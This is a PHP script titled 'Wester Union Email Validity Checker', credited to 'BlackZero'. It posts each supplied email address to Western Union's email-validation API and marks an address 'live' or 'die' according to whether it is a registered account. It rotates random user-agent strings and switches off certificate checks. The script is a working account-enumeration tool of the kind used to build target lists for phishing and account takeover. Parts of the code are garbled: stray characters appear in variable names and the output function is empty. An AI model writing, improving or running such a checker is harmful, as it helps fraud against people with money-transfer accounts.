Wester Union Email Validity Checker
Wester union Email Valid

Copyright BlackZero
$­("#result").attr("style","");'; function chooseRandomBrowserAndOS() { $frequencies = array( 34 => array( 89 => array('chrome', 'win'), 9 => array('chrome', 'mac'), 2 => array('chrome', 'lin') ), 32 => array( 100 => array('iexplorer', 'win') ), 25 => array( 83 => array('firefox', 'win'), 16 => array('firefox', 'mac'), 1 => array('firefox', 'lin') ), 7 => array( 95 => array('safari', 'mac'), 4 => array('safari', 'win'), 1 => array('safari', 'lin') ), 2 => array( 91 => array('opera', 'win'), 6 => array('opera', 'lin'), 3 => array('opera', 'mac') ) ); $rand = rand(1, 100); $sum = 0; foreach ($frequencies as $freq => $osFreqs) { $sum += $freq; if ($rand <= $sum) { $rand = rand(1, 100); $sum = 0; foreach ($osFreqs as $freq => $choice) { $sum += $freq; if ($rand <= $sum) { return $choice; } } } } throw new Exception("Frequencies don't sum to 100."); } function array_random(array $array) { return $array[array_rand($array, 1)]; } function nt_version() { return rand(5, 6) . '.' . rand(0, 1); } function ie_version() { return rand(7, 9) . '.0'; } function trident_version() { return rand(3, 5) . '.' . rand(0, 1); } function osx_version() { return "10_" . rand(5, 7) . '_' . rand(0, 9); } function chrome_version() { return rand(13, 15) . '.0.' . rand(800, 899) . '.0'; } function presto_version() { return '2.9.' . rand(160, 190); } function presto_version2() { return rand(10, 12) . '.00'; } function firefox($arch) { $ver = array_random(array( 'Gecko/' . date('Ymd', rand(strtotime('2011-1-1'), time())) . ' Firefox/' . rand(5, 7) . '.0', 'Gecko/' . date('Ymd', rand(strtotime('2011-1-1'), time())) . ' Firefox/' . rand(5, 7) . '.0.1', 'Gecko/' . date('Ymd', rand(strtotime('2010-1-1'), time())) . ' Firefox/3.6.' . rand(1, 20), 'Gecko/' . date('Ymd', rand(strtotime('2010-1-1'), time())) . ' Firefox/3.8' )); switch ($arch) { case 'lin': return "(X11; Linux {proc}; rv:" . rand(5, 7) . ".0) $ver"; case 'mac': $osx = osx_version(); return "(Macintosh; {proc} Mac OS X $osx rv:" . rand(2, 6) . ".0) $ver"; case 'win': default: $nt = nt_version(); return "(Windows NT $nt; {lang}; rv:1.9." . rand(0, 2) . ".20) $ver"; } } function safari($arch) { $saf = rand(531, 535) . '.' . rand(1, 50) . '.' . rand(1, 7); if (rand(0, 1) == 0) { $ver = rand(4, 5) . '.' . rand(0, 1); } else { $ver = rand(4, 5) . '.0.' . rand(1, 5); } switch ($arch) { case 'mac': $osx = osx_version(); return "(Macintosh; U; {proc} Mac OS X $osx rv:" . rand(2, 6) . ".0; {lang}) AppleWebKit/$saf (KHTML, like Gecko) Version/$ver Safari/$saf"; //case 'iphone': // return '(iPod; U; CPU iPhone OS ' . rand(3, 4) . '_' . rand(0, 3) . " like Mac OS X; {lang}) AppleWebKit/$saf (KHTML, like Gecko) Version/" . rand(3, 4) . ".0.5 Mobile/8B" . rand(111, 119) . " Safari/6$saf"; case 'win': default: $nt = nt_version(); return "(Windows; U; Windows NT $nt) AppleWebKit/$saf (KHTML, like Gecko) Version/$ver Safari/$saf"; } } function iexplorer($arch) { $ie_extra = array( '', '; .NET CLR 1.1.' . rand(4320, 4325) . '', '; WOW64' ); $nt = nt_version(); $ie = ie_version(); $trident = trident_version(); return "(compatible; MSIE $ie; Windows NT $nt; Trident/$trident)"; } function opera($arch) { $op_extra = array( '', '; .NET CLR 1.1.' . rand(4320, 4325) . '', '; WOW64' ); $presto = presto_version(); $version = presto_version2(); switch ($arch) { case 'lin': return "(X11; Linux {proc}; U; {lang}) Presto/$presto Version/$version"; case 'win': default: $nt = nt_version(); return "(Windows NT $nt; U; {lang}) Presto/$presto Version/$version"; } } function chrome($arch) { $saf = rand(531, 536) . rand(0, 2); $chrome = chrome_version(); switch ($arch) { case 'lin': return "(X11; Linux {proc}) AppleWebKit/$saf (KHTML, like Gecko) Chrome/$chrome Safari/$saf"; case 'mac': $osx = osx_version(); return "(Macintosh; U; {proc} Mac OS X $osx) AppleWebKit/$saf (KHTML, like Gecko) Chrome/$chrome Safari/$saf"; case 'win': default: $nt = nt_version(); return "(Windows NT $nt) AppleWebKit/$saf (KHTML, like Gecko) Chrome/$chrome Safari/$saf"; } } /** * Main function which will choose random browser * @param array $lang languages to choose from * @return string user agent */ function random_uagent(array $lang=array('en-US')) { list($browser, $os) = chooseRandomBrowserAndOs(); $proc = array( 'lin' => array('i686', 'x86_64'), 'mac' => array('Intel', 'PPC', 'U; Intel', 'U; PPC'), 'win' => array('foo') ); switch ($browser) { case 'firefox': $ua = "Mozilla/5.0 " . firefox($os); break; case 'safari': $ua = "Mozilla/5.0 " . safari($os); break; case 'iexplorer': $ua = "Mozilla/5.0 " . iexplorer($os); break; case 'opera': $ua = "Opera/" . rand(8, 9) . '.' . rand(10, 99) . ' ' . opera($os); break; case 'chrome': $ua = 'Mozilla/5.0 ' . chrome($os); break; } $ua = str_replace('{proc}', array_random($proc[$os]), $ua); $ua = str_replace('{lang}', array_random($lang), $ua); return $ua; } class alal { public function __construct($email,$sleep,$useragent) { $this->email = $email; $this->sleep = (int)$sleep; $this->useragent = $useragent; } function xflush() { static $output_handler = null; if ($output_handler === null) { $output_handler = @ini_get('output_handler'); } if ($output_handler == 'ob_gzhandler') { return; } flush(); if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false) { @ob_flush(); } else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE) { @ob_end_flush(); @ob_start(); } } public function curl($url='',$postdata='',$needCookie=true) { $ch = curl_init(); CURL_SETOPT($ch, CURLOPT_URL, $url); if ($postdata !== '') { CURL_SETOPT($ch, CURLOPT_POST, true); CURL_SETOPT($ch, CURLOPT_POSTFIELDS, $postdata); } curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_COOKIEFILE, '­*COOKIE.txt'); curl_setopt($ch, CURLOPT_COOKIEJAR, '­*COOKIE.txt'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); return $result; } public function createCookie() { $­*cookie = "­*COOKIE.txt"; if (!file_exists($­*cookie)) { $file = fopen($­*cookie,"a"); fwrite($file, ''); fclose($file); } return $­*cookie; } public function clearCookie() { if (file_exists("­*cookie/".$_SERVER['REMOTE_ADDR'].".­*cookie")) { file_put_contents("­*cookie/".$_SERVER['REMOTE_ADDR'].".­*cookie",''); } } public function fetch_value($str,$find_start,$find_end) { $start = stripos($str, $find_start); if($start===false) return ""; $length = strlen($find_start); $end = stripos(substr($str, $start+$length), $find_end); return trim(substr($str, $start+$length, $end)); } public function runJob() { $this->xflush(); $i = 0; $email = preg_replace('/\s+/', '', $this->email); $get = $this->curl('https://www.westernunion.com/presentationservice/rest/api/v1.0/EmailValidation?timestamp=&s=','{"email":"'.$email.'","security":{"session":{"id":"web-8a8499aa-53ad3c0d-0153-cb66f216-0361"}},"bashPath":"/us/en/"}'); if ($this->hasText($get,'this email address') == true) { echo $this->fill($email ,'live'); $this->clearCookie(); } else { echo $this->fill($email ,'die'); $this->clearCookie(); } if ($i == 5) { $i = 0; sleep($this->sleep); } $i++; $this->xflush(); } public function hasText($source,$text) { if (strpos($source,$text) !== false) { return true; } else { return false; } } public function fill($email,$type) { $return = ""; return $return; } } $emails = explode(' ',str_replace(' ','',$_POST['emails'])); $i = 0; foreach($emails as $line => $email) { $useragent = random_uagent(); $class = new alal($email,3,$useragent); $class->runJob(); } ?>